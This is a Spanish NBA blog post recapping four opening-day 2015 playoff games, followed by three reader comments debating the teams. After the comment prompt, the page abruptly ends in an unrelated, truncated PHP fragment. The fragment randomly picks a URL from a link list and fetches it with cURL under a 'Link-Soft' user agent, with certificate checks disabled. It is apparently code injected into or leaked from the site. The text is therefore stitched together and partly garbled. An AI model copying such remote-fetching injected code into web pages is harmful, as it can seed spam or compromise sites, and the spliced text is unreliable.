La crónica: Los Wizards golpean primero

19 de April de 2015 por TheDeerHunter

Jornada inaugural de los playoffs 2015, que nos ha dejado pocas sorpresas y mucha igualdad.  Sólo los Wizards lograron ganar a domicilio tras la preceptiva prórroga, como suele ser costumbre en sus enfrentamientos con los Raptors. Warriors, Bulls y Rockets amarraron su primer partido en casa, aunque en todos los casos con ciertas dificultades. Nadie dijo que fuera fácil. Veamos los detalles.

Wizards 93 – Raptors 86

Sin lugar a dudas el fichaje de Paul Pierce por los Wizards estaba pensado para este tipo de momentos. Ya sabemos cómo se las gasta el viejo zorro y anoche volvió a mostrar su facilidad para manejar la presión en un duelo que fue trabado para todos menos para él. Su equipo logró imponer el ritmo que más les convenía y los Raptors volvieron a pecar de inexperiencia, como ya les ocurriera el curso pasado. Sólo un arreón final liderado por Greivis Vasquez con más corazón que otra cosa permitó asegurar la prórroga e incluso darles la posibilidad puntual de ganar con un palmeo de Ross en el último instante del reglamentario. Por cierto, la presencia de Vasquez fue motivada por la expulsión de Kyle Lowry quien firmó una actuación para olvidar, como todos los titulares canadienses. No hubiera sido del todo justa una victoria local. Los Wizards pusieron las cosas en su sitio en el tiempo extra, donde Pierce y compañía volvieron a imponer su defensa y su saber hacer en el filo de la navaja.

Pelicans 99 – Warriors 106

No hubo “choteo” de los Warriors en esta ocasión y eso que se mascaba palizón tras un primer parcial de 28 a 13 y la retirada por lesión de Tyreke Evans, cuyo concurso en el resto de la eliminatoria peligra seriamente. Los Pelicans no se amilanaron. Con un descomunal Anthony Davis bien secundado por Quincy Pondexter, recordando al de los playoffs de hace dos años, lograron equilibrar los 2 cuartos siguientes e incluso meter el miedo en el cuerpo a los locales con conato de remontada en el último. Los hombres de Kerr lograron administrar la ventaja con demasiado sufrimiento y nervios, y llegaron a fallar 13 tiros libres en todo el encuentro, 8 de ellos en el tramo decisivo.

Bucks 91 – Bulls 103

Derrick Rose disputaba su primer partido de playoffs desde el 2012 y lo hizo con muy buen tono, con sus espectaculares penetraciones y la agresividad a la que nos tenía acostumbrados en el pasado. Junto a Rose, Jimmy Butler también se mostró imparable para los Bucks. Ambos se combinaron para anotar 48 puntos con buenos porcentajes. El mayor pecado de los locales anoche fue el alto número de pérdidas de balón, que ayudó decisivamente a que los Bucks no le perdieran la cara al choque prácticamente hasta el final. Buen partido de Kris Middleton, así como de Jerryd Bayless y John Henson desde el banco.

Mavs 108 – Rockets 118

Precioso duelo entre estos dos gallos del Oeste con nada menos que 14 hombres en dobles figuras. James Harden volvió a ser el mejor de los suyos, pero en esta ocasión con un mayor peso en el rol de facilitador que en el de ejecutor, con 11 asistencias que sus compañeros agradecieron. El choque tuvo dos caras, una con Dwight Howard en cancha, convirtiéndose en un muro insalvable para sus rivales y otra con él en el banquillo por acumulación de faltas, en la que los Mavs aprovechaban para causar estragos. El problema es que Howard sólo fue capaz de participar en 17 minutos. Por su parte Carlisle deberá mejorar muchos sus sistemas defensivos si quiere tener alguna esperanza en esta serie.

Comenta

3 comentarios a esta entrada

  1. Jose Luis dice:
    #1

    Increíble que la última jugada de Washington en tiempo reglamentario, sea Wall botando 15 segundos hasta que se tira una piedra… Pierce fue fichado para eso!

      Citar

  2. Albertis dice:
    #2

    Hola chicos,
    De los cuatro partidos de ayer el que mas ameno me ha parecido ha sido extrañamente el de los Bulls, creo que movieron bastante bien la bola para lo que les he visto hacer esta temporada (amén de que no han podido jugar con la plantilla completa casi nunca), Mirotic no puede ser que le vuelvan a conceder tan pocos minutos, no puede ser, este tío tiene que estar por delante de Gibson en la rotación, sé que son jugadores casi antagónicos y cada uno aporta en facetas distintas pero estos escasos minutos a Mirotic por real decreto cuando están todos sanos me parece una barbaridad; creo que si los Bulls tuvieran de complemento de Rose a un Dragic serían candidatos claros al anillo, vaya profundidad de banquillo…
    El partido Wizards – Raptors me pareció entretenido, le veo algo mas de equipo/banquillo a los de Washington aunque Wall si asume la responsabilidad creo que debería de penetrar porque no lo veo metiendo una de 4 o 5 metros, mejor a Pierce; aún así no les veo opciones frente a Atlanta.
    Del Pelicans – Warriors creo que la diferencia es abismal pero quizá les puedan robar algún partido en New Orleans, y Bogut en playoffs??!! Debe ser de sus primeros partidos en playoffs no?!! jeje, creo que es un jugador casi básico en la pintura, ayer se impuso mucho y cortó mucho juego, se me antoja imprescindible que aguante sano…
    Hoy he visto el Mavs – Rockets y disiento con TheDeerHunter, me ha parecido un partido malo de solemnidad! Fallones los dos equipos, sin sistemas, mala selección de tiros, Mavs era una máquina de perder bolas tontas y ha habido rachas que parecía un juego de a ver quien fallaba mas; Dallas en general horrible no, lo siguiente, jugando a arreones pero sin convicción ninguna, sigo pensando que el trade que hicieron para traer a Rondo ha sido un error, este jugador o no es el de los Celtics o no se adapta o el bajón ha sido tremendo, no lo digo porque tenga que tirar y meterlas pero es que no veo que le dé ninguna consistencia como point guard al equipo, lo veía bastante mejor el año pasado, en el segundo cuarto parecía que enderezaba pero nada, Dirk está ya muy mayor para sacarlos de apuros… Y por los Rockets me da pena decirlo pero no creo que con Terry / Prigioni como bases lleguen muy lejos.
    Cualquiera de estos dos equipos creo que caerían con cierta facilidad frente a Warriors o Spurs.
    Saludos.

      Citar

  3. GreenPride dice:
    #3

    Primer día de PO y pocas sorpresas. Wizards robó la ventaja campo de la mano de The Truth y jugando un ritmo de juego bajo muy propio de estas alturas de la temporada. Los Raptors les darán problemas todavía pero parecen mejor colocados en esta eliminatoria.
    Los Bulls tuvieron buenas y malas noticias. Las buenas ver al equipo sano incluido Rose que jugó un muy buen partido siendo responsable del despegue de su equipo. Las malas, su inconsistencia defensiva así como las perdidas que dejaron hacer la goma demasiado a los Bucks, equipo que se mostró muy limitado en ataque. Los Bulls deberían dominar la serie sin demasiados problemas.
    Por su parte los Warriors ganaron sin convencer ante unos peleones Pelicans. La baja de Evans es definitiva para ellos si se confirma pues para mí ha sido el segundo mejor del equipo este año. Enorme último cuarto de Davis que con un poco de ayuda puso en dificultad a unos Warriors poco consistentes. Gran partido de Bogut pero los Warriors tendrán que jugar mejor si quieren aspirar al anillo.
    Y por último el duelo texano cayó del lado de los Rockets. Parece mentira que con un quinteto Rondo-Ellis-Parsons-Nowitzki-Chandler puedas jugar tan deslabazado y con tan poca defensa y más con Carlisle de entrenador pero para mí Dallas no tiene claro a qué juega ni quienes son sus jugadores referencia. Mucho 1×1 y así difícil. Los Rockets un tanto anárquicos pero ni siquiera les hizo falta un gran partido de Harden para ganar. Mucho a mejorar en los Mavs si quieren dar guerra.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>